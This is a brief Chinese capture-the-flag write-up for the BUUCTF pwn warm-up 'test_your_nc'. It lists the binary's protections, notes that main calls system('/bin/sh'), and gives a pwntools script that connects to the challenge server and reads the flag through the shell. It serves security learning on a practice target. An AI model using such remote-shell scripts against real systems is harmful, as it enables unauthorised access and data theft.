BUUCTF–PWN–test_your_nc
首先查保护->看链接类型->增加可执行权限->运行
64位,小端序
开启部分RELRO---got表仍可写
未开启canary保护---栈溢出
开启NX保护----堆栈不可执行
开启PIE----程序地址不是真实地址
动态链接
程序执行后出现一个$符号,随便输入后又出现了/bin/sh
ida看一下
主函数直接就是调用了system(“/bin/sh”),直接获得shell
或者写个exp
exp
from pwn import *
sh = remote("node4.buuoj.cn",26538)
sh.sendline('cat flag')
sh.interactive()